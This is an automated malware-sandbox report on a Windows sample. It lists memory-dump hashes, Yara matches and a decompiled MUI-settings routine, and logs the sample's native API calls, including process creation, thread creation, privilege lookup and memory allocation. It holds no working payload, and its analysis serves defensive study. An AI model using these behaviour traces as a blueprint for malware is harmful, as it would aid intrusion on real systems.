                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                      • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                      • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp Download File
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E00A98788(signed int __ecx, void* __edx, signed int _a4) {
                                                      				signed int _v8;
                                                      				short* _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				void* _t216;
                                                      				intOrPtr _t231;
                                                      				short* _t235;
                                                      				intOrPtr _t257;
                                                      				short* _t261;
                                                      				intOrPtr _t284;
                                                      				intOrPtr _t288;
                                                      				void* _t314;
                                                      				signed int _t318;
                                                      				short* _t319;
                                                      				intOrPtr _t321;
                                                      				void* _t328;
                                                      				void* _t329;
                                                      				char* _t332;
                                                      				signed int _t333;
                                                      				signed int* _t334;
                                                      				void* _t335;
                                                      				void* _t338;
                                                      				void* _t339;
                                                      
                                                      				_t328 = __edx;
                                                      				_t322 = __ecx;
                                                      				_t318 = 0;
                                                      				_t334 = _a4;
                                                      				_v8 = 0;
                                                      				_v28 = 0;
                                                      				_v48 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v32 = 0;
                                                      				_v52 = 0;
                                                      				if(_t334 == 0) {
                                                      					_t329 = 0xc000000d;
                                                      					L49:
                                                      					_t334[0x11] = _v56;
                                                      					 *_t334 =  *_t334 | 0x00000800;
                                                      					_t334[0x12] = _v60;
                                                      					_t334[0x13] = _v28;
                                                      					_t334[0x17] = _v20;
                                                      					_t334[0x16] = _v48;
                                                      					_t334[0x18] = _v40;
                                                      					_t334[0x14] = _v32;
                                                      					_t334[0x15] = _v52;
                                                      					return _t329;
                                                      				}
                                                      				_v56 = 0;
                                                      				if(E00A98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						_t207 = E00A7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      					}
                                                      					_push(1);
                                                      					_v8 = _t318;
                                                      					E00A9718A(_t207);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				if(E00A98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                      					_t333 =  *_v8;
                                                      					_v60 = _t333;
                                                      					_t314 = E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					_push(_t333);
                                                      					_v8 = _t318;
                                                      					E00A9718A(_t314);
                                                      					_t335 = _t335 + 4;
                                                      				}
                                                      				_t216 = E00A98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                      				_t332 = ";";
                                                      				if(_t216 < 0) {
                                                      					L17:
                                                      					if(E00A98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                      						L30:
                                                      						if(E00A98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                      							L46:
                                                      							_t329 = 0;
                                                      							L47:
                                                      							if(_v8 != _t318) {
                                                      								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      							}
                                                      							if(_v28 != _t318) {
                                                      								if(_v20 != _t318) {
                                                      									E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      									_v20 = _t318;
                                                      									_v40 = _t318;
                                                      								}
                                                      							}
                                                      							goto L49;
                                                      						}
                                                      						_t231 = _v24;
                                                      						_t322 = _t231 + 4;
                                                      						_push(_t231);
                                                      						_v52 = _t322;
                                                      						E00A9718A(_t231);
                                                      						if(_t322 == _t318) {
                                                      							_v32 = _t318;
                                                      						} else {
                                                      							_v32 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      						}
                                                      						if(_v32 == _t318) {
                                                      							_v52 = _t318;
                                                      							L58:
                                                      							_t329 = 0xc0000017;
                                                      							goto L47;
                                                      						} else {
                                                      							E00A72340(_v32, _v8, _v24);
                                                      							_v16 = _v32;
                                                      							_a4 = _t318;
                                                      							_t235 = E00A8E679(_v32, _t332);
                                                      							while(1) {
                                                      								_t319 = _t235;
                                                      								if(_t319 == 0) {
                                                      									break;
                                                      								}
                                                      								 *_t319 = 0;
                                                      								_t321 = _t319 + 2;
                                                      								E00A7E2A8(_t322,  &_v68, _v16);
                                                      								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      								_v16 = _t321;
                                                      								_t235 = E00A8E679(_t321, _t332);
                                                      								_pop(_t322);
                                                      							}
                                                      							_t236 = _v16;
                                                      							if( *_v16 != _t319) {
                                                      								E00A7E2A8(_t322,  &_v68, _t236);
                                                      								if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      									_a4 = _a4 + 1;
                                                      								}
                                                      							}
                                                      							if(_a4 == 0) {
                                                      								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                      								_v52 = _v52 & 0x00000000;
                                                      								_v32 = _v32 & 0x00000000;
                                                      							}
                                                      							if(_v8 != 0) {
                                                      								E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                      							}
                                                      							_v8 = _v8 & 0x00000000;
                                                      							_t318 = 0;
                                                      							goto L46;
                                                      						}
                                                      					}
                                                      					_t257 = _v24;
                                                      					_t322 = _t257 + 4;
                                                      					_push(_t257);
                                                      					_v40 = _t322;
                                                      					E00A9718A(_t257);
                                                      					_t338 = _t335 + 4;
                                                      					if(_t322 == _t318) {
                                                      						_v20 = _t318;
                                                      					} else {
                                                      						_v20 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      					}
                                                      					if(_v20 == _t318) {
                                                      						_v40 = _t318;
                                                      						goto L58;
                                                      					} else {
                                                      						E00A72340(_v20, _v8, _v24);
                                                      						_v16 = _v20;
                                                      						_a4 = _t318;
                                                      						_t261 = E00A8E679(_v20, _t332);
                                                      						_t335 = _t338 + 0x14;
                                                      						while(1) {
                                                      							_v12 = _t261;
                                                      							if(_t261 == _t318) {
                                                      								break;
                                                      							}
                                                      							_v12 = _v12 + 2;
                                                      							 *_v12 = 0;
                                                      							E00A7E2A8(_v12,  &_v68, _v16);
                                                      							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      							_v16 = _v12;
                                                      							_t261 = E00A8E679(_v12, _t332);
                                                      							_pop(_t322);
                                                      						}
                                                      						_t269 = _v16;
                                                      						if( *_v16 != _t318) {
                                                      							E00A7E2A8(_t322,  &_v68, _t269);
                                                      							if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      								_a4 = _a4 + 1;
                                                      							}
                                                      						}
                                                      						if(_a4 == _t318) {
                                                      							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                      							_v40 = _t318;
                                                      							_v20 = _t318;
                                                      						}
                                                      						if(_v8 != _t318) {
                                                      							E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      						}
                                                      						_v8 = _t318;
                                                      						goto L30;
                                                      					}
                                                      				}
                                                      				_t284 = _v24;
                                                      				_t322 = _t284 + 4;
                                                      				_push(_t284);
                                                      				_v48 = _t322;
                                                      				E00A9718A(_t284);
                                                      				_t339 = _t335 + 4;
                                                      				if(_t322 == _t318) {
                                                      					_v28 = _t318;
                                                      				} else {
                                                      					_v28 = E00A7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                      				}
                                                      				if(_v28 == _t318) {
                                                      					_v48 = _t318;
                                                      					goto L58;
                                                      				} else {
                                                      					E00A72340(_v28, _v8, _v24);
                                                      					_v16 = _v28;
                                                      					_a4 = _t318;
                                                      					_t288 = E00A8E679(_v28, _t332);
                                                      					_t335 = _t339 + 0x14;
                                                      					while(1) {
                                                      						_v12 = _t288;
                                                      						if(_t288 == _t318) {
                                                      							break;
                                                      						}
                                                      						_v12 = _v12 + 2;
                                                      						 *_v12 = 0;
                                                      						E00A7E2A8(_v12,  &_v68, _v16);
                                                      						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      						_v16 = _v12;
                                                      						_t288 = E00A8E679(_v12, _t332);
                                                      						_pop(_t322);
                                                      					}
                                                      					_t296 = _v16;
                                                      					if( *_v16 != _t318) {
                                                      						E00A7E2A8(_t322,  &_v68, _t296);
                                                      						if(E00A95553(_t328,  &_v68,  &_v36) != 0) {
                                                      							_a4 = _a4 + 1;
                                                      						}
                                                      					}
                                                      					if(_a4 == _t318) {
                                                      						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                      						_v48 = _t318;
                                                      						_v28 = _t318;
                                                      					}
                                                      					if(_v8 != _t318) {
                                                      						E00A7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                      					}
                                                      					_v8 = _t318;
                                                      					goto L17;
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      • WindowsExcludedProcs, xrefs: 00A987C1
                                                      • Kernel-MUI-Number-Allowed, xrefs: 00A987E6
                                                      • Kernel-MUI-Language-SKU, xrefs: 00A989FC
                                                      • Kernel-MUI-Language-Allowed, xrefs: 00A98827
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00A98914
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: _wcspbrk
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 402402107-258546922
                                                      • Opcode ID: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                      • Instruction ID: cc9c08e51eaef2e9edfab93a9b0e80f7bf7f0d6c999efbb6c97ac7f7e2a2df57
                                                      • Opcode Fuzzy Hash: 623889948942703a605aac70c318d45e8201d10fa297e61ca8656f83ca3d382a
                                                      • Instruction Fuzzy Hash: FBF1D6B2E00249EFCF11EF95CA819EEB7F9FF09300F15846AE505A7211EB359A45DB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD22F4
                                                      Strings
                                                      • RTL: Resource at %p, xrefs: 00AD230B
                                                      • RTL: Re-Waiting, xrefs: 00AD2328
                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AD22FC
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                      • API String ID: 885266447-871070163
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Executed Functions

                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 0009A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: I$!J
                                                      • API String ID: 2738559852-2043589232
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A39D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00094BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00094BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009A39D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!J,FFFFFFFF,?,bM,?,00000000), ref: 0009A445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID: !J
                                                      • API String ID: 2738559852-3045386990
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(@M,?,?,00094D40,00000000,FFFFFFFF), ref: 0009A4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @M
                                                      • API String ID: 3535843008-3016809790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtClose.NTDLL(@M,?,?,00094D40,00000000,FFFFFFFF), ref: 0009A4A5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close
                                                      • String ID: @M
                                                      • API String ID: 3535843008-3016809790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A569
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 0009A569
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.692467198.00000000009F0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                      • Associated: 00000008.00000002.692459553.00000000009E0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692670851.0000000000AD0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692685212.0000000000AE0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692706344.0000000000AE4000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692723406.0000000000AE7000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.692734354.0000000000AF0000.00000040.00000001.sdmp
                                                      • Associated: 00000008.00000002.693915836.0000000000B50000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • Sleep.KERNELBASE(000007D0), ref: 00099118
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: net.dll$wininet.dll
                                                      • API String ID: 3472027048-1269752229
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&E,?,00094C9F,00094C9F,?,00094526,?,?,?,?,?,00000000,00000000,?), ref: 0009A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &E
                                                      • API String ID: 1279760036-928243876
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A68D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD52
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084A15,00000000,00000000,00700069,?,00083AF8), ref: 00099C71
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Path$NameName_
                                                      • String ID:
                                                      • API String ID: 3514427675-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A724
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 3f184d03a8097b7f8423271d4b501b509d1038ddc8f17935dcad75214cfdadbb
                                                      • Instruction ID: 696844527b8e53a7e969de9ca514451904c056b8edfbd072da4580b67836ba35
                                                      • Opcode Fuzzy Hash: 3f184d03a8097b7f8423271d4b501b509d1038ddc8f17935dcad75214cfdadbb
                                                      • Instruction Fuzzy Hash: 6801AFB2210108AFCB54CF99DC81EEB37A9AF8C354F158258FA1DE7245D630E851CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A724
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: 5a8c08d163474c49547c0f6c35b253b3023fb7b495797746ff9d36dd09641573
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 0401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F040,?,?,00000000), ref: 000991DC
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
                                                      • Instruction ID: 534dd52df73ec83028703d1d2998e606eec88586b204f6ab6263c6a07508276b
                                                      • Opcode Fuzzy Hash: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
                                                      • Instruction Fuzzy Hash: 48E06D373903043AE6206599AC02FE7B39C9B81B21F14002AFA0DEB2C2D595F80142A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00084A15,00000000,00000000,00700069,?,00083AF8), ref: 00099C71
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Path$NameName_
                                                      • String ID:
                                                      • API String ID: 3514427675-0
                                                      • Opcode ID: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                      • Instruction ID: 1e79cee6634a7e85489e5ce1719c39a24ee2608bf1f13fb00772e6a178f97bba
                                                      • Opcode Fuzzy Hash: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                      • Instruction Fuzzy Hash: 63E01AB6600208AFCB14DF88CC85EE77BACEF88754F008458BA1C97242C670F9108BF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1C2,0008F1C2,?,00000000,?,?), ref: 0009A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.691810653.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
